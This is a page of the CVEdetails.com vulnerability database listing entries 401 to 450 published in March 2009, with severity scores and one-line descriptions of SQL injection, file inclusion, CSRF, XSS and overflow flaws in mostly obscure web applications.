CVEdetails.com the ultimate security vulnerability data source
(e.g.: CVE-2009-1234 or 2010-1234 or 20101234)
Log In   Register
Vulnerability Feeds & WidgetsNew   www.itsecdb.com  

Security Vulnerabilities Published In March 2009

Press ESC to close
# CVE ID CWE ID # of Exploits Vulnerability Type(s) Publish Date Update Date Score Gained Access Level Access Complexity Authentication Conf. Integ. Avail.
401 CVE-2008-6487 89 Exec Code Sql 2009-03-18 2017-09-28
7.5
None Remote Low Not required Partial Partial Partial
Multiple SQL injection vulnerabilities in login.asp in Digiappz DigiAffiliate 1.4 and earlier allow remote attackers to execute arbitrary SQL commands via the (1) admin and (2) password fields.
402 CVE-2008-6486 94 Exec Code File Inclusion 2009-03-18 2018-10-11
6.8
None Remote Medium Not required Partial Partial Partial
PHP remote file inclusion vulnerability in slideshow_uploadvideo.content.php in SharedLog, when register_globals is enabled, allows remote attackers to execute arbitrary PHP code via a URL in the GLOBALS[root_dir] parameter.
403 CVE-2008-6485 89 Exec Code Sql 2009-03-18 2017-09-28
7.5
None Remote Low Not required Partial Partial Partial
SQL injection vulnerability in index.php in SoftComplex PHP Image Gallery allows remote attackers to execute arbitrary SQL commands via the ctg parameter.
404 CVE-2008-6484 89 Exec Code Sql 2009-03-18 2017-09-28
7.5
None Remote Low Not required Partial Partial Partial
SQL injection vulnerability in login.php in Mole Group Taxi Map Script (aka Taxi Calc Dist Script) allows remote attackers to execute arbitrary SQL commands via the user field.
405 CVE-2008-6483 94 Exec Code File Inclusion 2009-03-18 2017-09-28
7.5
None Remote Low Not required Partial Partial Partial
PHP remote file inclusion vulnerability in admin.googlebase.php in the Ecom Solutions VirtueMart Google Base (aka com_googlebase or Froogle) component 1.1 for Joomla! allows remote attackers to execute arbitrary PHP code via a URL in the mosConfig_absolute_path parameter.
406 CVE-2008-6482 94 Exec Code File Inclusion 2009-03-18 2017-09-28
6.8
None Remote Medium Not required Partial Partial Partial
PHP remote file inclusion vulnerability in admin.treeg.php in the Flash Tree Gallery (com_treeg) component 1.0 for Joomla!, when register_globals is enabled, allows remote attackers to execute arbitrary PHP code via the mosConfig_live_site parameter.
407 CVE-2008-6481 89 Exec Code Sql 2009-03-17 2017-09-28
7.5
None Remote Low Not required Partial Partial Partial
SQL injection vulnerability in the Versioning component (com_versioning) 1.0.2 in Joomla! and Mambo allows remote attackers to execute arbitrary SQL commands via the id parameter in an edit task to index.php.
408 CVE-2008-6480 352 CSRF 2009-03-16 2018-10-11
6.8
None Remote Medium Not required Partial Partial Partial
Cross-site request forgery (CSRF) vulnerability in engine/modules/imagepreview.php in Datalife Engine 6.7 allows remote attackers to hijack the authentication of arbitrary users for requests that use a modified image parameter.
409 CVE-2008-6479 352 CSRF 2009-03-16 2018-10-11
6.8
User Remote Medium Not required Partial Partial Partial
Cross-site request forgery (CSRF) vulnerability in the "change password" feature in the VZPP web interface for Parallels Virtuozzo 25.4.swsoft (build 3.0.0-25.4.swsoft) allows remote attackers to modify the password via a link or IMG tag to vz/cp/pwd.
410 CVE-2008-6478 352 CSRF 2009-03-16 2018-10-11
6.8
None Remote Medium Not required Partial Partial Partial
Cross-site request forgery (CSRF) vulnerability in the file manager in the VZPP web interface for Parallels Virtuozzo 365.6.swsoft (build 4.0.0-365.6.swsoft) and 25.4.swsoft (build 3.0.0-25.4.swsoft) allows remote attackers to create and delete arbitrary files as the administrator via a link or IMG tag to (1) create-file and (2) list-control in vz/cp/vzdir/infrman/envs/files/; or modify system configuration via the path parameter to vz/cp/vzdir/infrman/envs/files/index.
411 CVE-2008-6477 89 Exec Code Sql 2009-03-16 2017-09-28
7.5
None Remote Low Not required Partial Partial Partial
SQL injection vulnerability in Mumbo Jumbo Media OP4 allows remote attackers to execute arbitrary SQL commands via the id parameter to index.php.
412 CVE-2008-6476 79 XSS 2009-03-16 2017-08-16
4.3
None Remote Medium Not required None Partial None
Cross-site scripting (XSS) vulnerability in blog/search.aspx in BlogEngine.NET allows remote attackers to inject arbitrary web script or HTML via the q parameter.
413 CVE-2008-6475 89 Exec Code Sql 2009-03-16 2017-09-28
7.5
None Remote Low Not required Partial Partial Partial
SQL injection vulnerability in the guestbook component (components/guestbook/guestbook.php) in Drake CMS 0.4.11 and earlier allows remote attackers to execute arbitrary SQL commands via the Via HTTP header (HTTP_VIA) to index.php.
414 CVE-2008-6474 94 2009-03-16 2018-10-30
9.0
Admin Remote Low Single system Complete Complete Complete
The management interface in F5 BIG-IP 9.4.3 allows remote authenticated users with Resource Manager privileges to inject arbitrary Perl code via unspecified configuration settings related to Perl EP3 with templates, probably triggering static code injection.
415 CVE-2008-6473 255 2009-03-16 2018-10-11
6.4
None Remote Low Not required None Partial Partial
_blogadata/include/init_pass2.php in Blogator-script 0.95 allows remote attackers to change the password for arbitrary users via a modified "a" parameter with a "%" wildcard symbol in the b parameter.
416 CVE-2008-6472 399 DoS 2009-03-14 2017-09-28
4.3
None Remote Medium Not required None None Partial
The WLCCP dissector in Wireshark 0.99.7 through 1.0.4 allows remote attackers to cause a denial of service (infinite loop) via unspecified vectors.
417 CVE-2008-6471 89 Exec Code Sql 2009-03-13 2017-09-28
7.5
None Remote Low Not required Partial Partial Partial
SQL injection vulnerability in detail.php in MountainGrafix easyLink 1.1.0 allows remote attackers to execute arbitrary SQL commands via the cat parameter in a show action.
418 CVE-2008-6470 +Info 2009-03-13 2017-08-16
5.0
None Remote Low Not required Partial None None
Multiple unspecified vulnerabilities in ClanSphere before 2008.2.1 allow remote attackers to obtain sensitive information, and possibly have unknown other impact, via vectors related to "javascript insert" and the (1) mods/messages/getusers.php and (2) mods/abcode/listimg.php files. NOTE: some of these details are obtained from third party information.
419 CVE-2008-6469 89 Exec Code Sql 2009-03-13 2017-09-28
7.5
None Remote Low Not required Partial Partial Partial
SQL injection vulnerability in index.php in PlainCart 1.1.2 allows remote attackers to execute arbitrary SQL commands via the p parameter.
420 CVE-2008-6468 89 Exec Code Sql 2009-03-13 2017-09-28
7.5
User Remote Low Not required Partial Partial Partial
SQL injection vulnerability in index.php in Diesel Pay allows remote attackers to execute arbitrary SQL commands via the area parameter in a browse action.
421 CVE-2008-6467 89 Exec Code Sql 2009-03-13 2017-09-28
7.5
None Remote Low Not required Partial Partial Partial
SQL injection vulnerability in jobs/jobseekers/job-info.php in Diesel Job Site allows remote attackers to execute arbitrary SQL commands via the job_id parameter.
422 CVE-2008-6466 89 Exec Code Sql 2009-03-13 2017-09-28
7.5
None Remote Low Not required Partial Partial Partial
SQL injection vulnerability in image_gallery.php in the Akira Powered Image Gallery (image_gallery) plugin 0.9.6.2 for e107 allows remote attackers to execute arbitrary SQL commands via the image parameter in an image-detail action.
423 CVE-2008-6465 79 XSS 2009-03-13 2017-08-16
4.3
None Remote Medium Not required None Partial None
Multiple cross-site scripting (XSS) vulnerabilities in login.php in webshell4 in Parallels H-Sphere 3.0.0 P9 and 3.1 P1 allow remote attackers to inject arbitrary web script or HTML via the (1) err, (2) errorcode, and (3) login parameters.
424 CVE-2008-6464 89 Exec Code Sql 2009-03-13 2017-09-28
7.5
User Remote Low Not required Partial Partial Partial
SQL injection vulnerability in event.php in Mevin Productions Basic PHP Events Lister 1.0 allows remote attackers to execute arbitrary SQL commands via the id parameter.
425 CVE-2008-6463 89 Exec Code Sql 2009-03-13 2009-08-19
7.5
None Remote Low Not required Partial Partial Partial
SQL injection vulnerability in the Diocese of Portsmouth Church Search (pd_churchsearch) extension before 0.1.1, and 0.2.10 and earlier 0.2.x versions, an extension for TYPO3, allows remote attackers to execute arbitrary SQL commands via unspecified vectors.
426 CVE-2008-6462 89 Exec Code Sql 2009-03-13 2017-08-16
7.5
None Remote Low Not required Partial Partial Partial
SQL injection vulnerability in the My quiz and poll (myquizpoll) extension before 0.1.4 for TYPO3 allows remote attackers to execute arbitrary SQL commands via unspecified vectors.
427 CVE-2008-6461 89 Exec Code Sql 2009-03-13 2017-08-16
7.5
User Remote Low Not required Partial Partial Partial
SQL injection vulnerability in the Random Prayer 2 (ste_prayer2) extension before 0.0.3 for TYPO3 allows remote attackers to execute arbitrary SQL commands via unspecified vectors.
428 CVE-2008-6460 89 Exec Code Sql 2009-03-13 2017-08-16
7.5
User Remote Low Not required Partial Partial Partial
SQL injection vulnerability in the Simple Random Objects (mw_random_objects) extension 1.0.3 and earlier for TYPO3 allows remote attackers to execute arbitrary SQL commands via unspecified vectors.
429 CVE-2008-6459 89 Exec Code Sql 2009-03-13 2017-08-16
7.5
None Remote Low Not required Partial Partial Partial
SQL injection vulnerability in the auto BE User Registration (autobeuser) extension 0.0.2 and earlier for TYPO3 allows remote attackers to execute arbitrary SQL commands via unspecified vectors.
430 CVE-2008-6458 89 Exec Code Sql 2009-03-13 2017-08-16
7.5
None Remote Low Not required Partial Partial Partial
SQL injection vulnerability in the FE address edit for tt_address & direct mail (dmaddredit) extension 0.4.0 and earlier for TYPO3 allows remote attackers to execute arbitrary SQL commands via unspecified vectors.
431 CVE-2008-6457 89 Exec Code Sql 2009-03-13 2017-08-16
7.5
None Remote Low Not required Partial Partial Partial
SQL injection vulnerability in the Swigmore institute (cgswigmore) extension before 0.1.2 for TYPO3 allows remote attackers to execute arbitrary SQL commands via unspecified vectors.
432 CVE-2008-6456 89 Exec Code Sql 2009-03-13 2017-08-16
7.5
None Remote Low Not required Partial Partial Partial
SQL injection vulnerability in the HBook (h_book) extension 2.3.0 and earlier for TYPO3 allows remote attackers to execute arbitrary SQL commands via unspecified vectors.
433 CVE-2008-6455 287 2009-03-13 2017-08-16
6.8
User Remote Medium Not required Partial Partial Partial
Session fixation vulnerability in Edikon phpShop 0.8.1 allows remote attackers to hijack web sessions via unspecified vectors. NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
434 CVE-2008-6454 89 Exec Code Sql 2009-03-13 2017-09-28
7.5
None Remote Low Not required Partial Partial Partial
SQL injection vulnerability in section.php in 6rbScript 3.3 allows remote attackers to execute arbitrary SQL commands via the singerid parameter in a singers action.
435 CVE-2008-6453 22 Dir. Trav. 2009-03-13 2017-09-28
4.3
None Remote Medium Not required Partial None None
Directory traversal vulnerability in section.php in 6rbScript 3.3, when magic_quotes_gpc is disabled, allows remote attackers to read arbitrary files via a .. (dot dot) in the name parameter.
436 CVE-2008-6452 89 Exec Code Sql 2009-03-13 2017-09-28
7.5
None Remote Low Not required Partial Partial Partial
SQL injection vulnerability in show_vote.php in Oceandir 2.9 and earlier allows remote attackers to execute arbitrary SQL commands via the id parameter.
437 CVE-2008-6451 89 Exec Code Sql 2009-03-13 2017-09-28
7.5
None Remote Low Not required Partial Partial Partial
SQL injection vulnerability in humor.php in jPORTAL 2 allows remote attackers to execute arbitrary SQL commands via the id parameter. NOTE: this might overlap CVE-2004-2036 or CVE-2005-3509.
438 CVE-2008-6450 79 XSS 2009-03-09 2017-08-16
4.3
None Remote Medium Not required None Partial None
Cross-site scripting (XSS) vulnerability in Under Construction, Baby (UCB) PC2M 0.9.22.4 and earlier allows remote attackers to inject arbitrary web script or HTML via unknown vectors.
439 CVE-2008-6449 352 CSRF 2009-03-09 2017-08-16
4.0
None Remote High Not required None Partial Partial
Cross-site request forgery (CSRF) vulnerability in multiple Century Systems routers including XR-410 before 1.6.9, XR-510 before 3.5.3, XR-440 before 1.7.8, and other XR series routers from XR-510 to XR-730 allows remote attackers to modify configuration as the administrator via unknown vectors.
440 CVE-2008-6448 79 XSS 2009-03-09 2017-08-16
4.3
None Remote Medium Not required None Partial None
Cross-site scripting (XSS) vulnerability in install.cgi in SKYARC System MTCMS WYSIWYG Editor allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
441 CVE-2008-6447 119 Exec Code Overflow 2009-03-09 2017-09-28
9.3
None Remote Medium Not required Complete Complete Complete
Buffer overflow in emmailstore.dll 6.5.0.3 in the QuikSoft EasyMail MailStore ActiveX control allows remote attackers to execute arbitrary code via a long first argument to the CreateStore method.
442 CVE-2008-6446 94 2009-03-09 2017-09-28
7.5
User Remote Low Not required Partial Partial Partial
Static code injection vulnerability in the Guestbook component in CMS MAXSITE allows remote attackers to inject arbitrary PHP code into the guestbook via the message parameter.
443 CVE-2008-6445 287 2009-03-09 2017-08-16
7.5
User Remote Low Not required Partial Partial Partial
Unspecified vulnerability in YourPlace before 1.0.1 has unknown impact and attack vectors, possibly related to improper authentication and the ability to upload arbitrary PHP code. NOTE: some of these details are obtained from third party information.
444 CVE-2008-6444 119 Exec Code Overflow 2009-03-09 2018-10-11
10.0
Admin Remote Low Not required Complete Complete Complete
Stack-based buffer overflow in CSTransfer.dll in Baidu Hi IM might allow remote attackers to execute arbitrary code via a crafted packet, probably related to an improper length value.
445 CVE-2008-6443 89 Exec Code Sql 2009-03-09 2017-08-16
7.5
None Remote Low Not required Partial Partial Partial
SQL injection vulnerability in forum_duzen.php in phpKF allows remote attackers to execute arbitrary SQL commands via the fno parameter.
446 CVE-2008-6442 2009-03-09 2017-08-16
5.8
None Remote Medium Not required None Partial Partial
Insecure method vulnerability in Sina Inc. DLoader Class ActiveX Control allows remote attackers to overwrite arbitrary files via a URL in the first parameter to the DonwloadAndInstall method. NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
447 CVE-2008-6441 134 Exec Code 2009-03-09 2018-10-11
9.3
Admin Remote Medium Not required Complete Complete Complete
Format string vulnerability in the Epic Games Unreal engine client, as used in multiple games, allows remote servers to execute arbitrary code via (1) the CLASS parameter in a DLMGR command, (2) a malformed package (PKG), and possibly (3) the LEVEL parameter in a WELCOME command.
448 CVE-2008-6440 287 +Info 2009-03-06 2009-03-10
5.0
None Remote Low Not required Partial None None
Cerberus Helpdesk before 4.0 (Build 600) allows remote attackers to obtain sensitive information via direct requests for "controllers ... that aren't standard helpdesk pages," possibly involving the (1) /display and (2) /kb URIs.
449 CVE-2008-6439 79 XSS 2009-03-06 2018-10-11
4.3
None Remote Medium Not required None Partial None
Cross-site scripting (XSS) vulnerability in search_results.php in ABK-Soft AbleDating 2.4 allows remote attackers to inject arbitrary web script or HTML via the keyword parameter.
450 CVE-2008-6438 89 Exec Code Sql 2009-03-06 2018-10-11
7.5
User Remote Low Not required Partial Partial Partial
SQL injection vulnerability in macgurublog_menu/macgurublog.php in the MacGuru BLOG Engine plugin 2.2 for e107 allows remote attackers to execute arbitrary SQL commands via the uid parameter, a different vector than CVE-2008-2455. NOTE: it was later reported that 2.1.4 is also affected.
Total number of vulnerabilities : 554   Page : 1 2 3 4 5 6 7 8 9 (This Page)10 11 12
CVE is a registred trademark of the MITRE Corporation and the authoritative source of CVE content is MITRE's CVE web site. CWE is a registred trademark of the MITRE Corporation and the authoritative source of CWE content is MITRE's CWE web site. OVAL is a registered trademark of The MITRE Corporation and the authoritative source of OVAL content is MITRE's OVAL web site.
Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties, implied or otherwise, with regard to this information or its use. Any use of this information is at the user's risk. It is the responsibility of user to evaluate the accuracy, completeness or usefulness of any information, opinion, advice or other content. EACH USER WILL BE SOLELY RESPONSIBLE FOR ANY consequences of his or her direct or indirect use of this web site. ALL WARRANTIES OF ANY KIND ARE EXPRESSLY DISCLAIMED. This site will NOT BE LIABLE FOR ANY DIRECT, INDIRECT or any other kind of loss.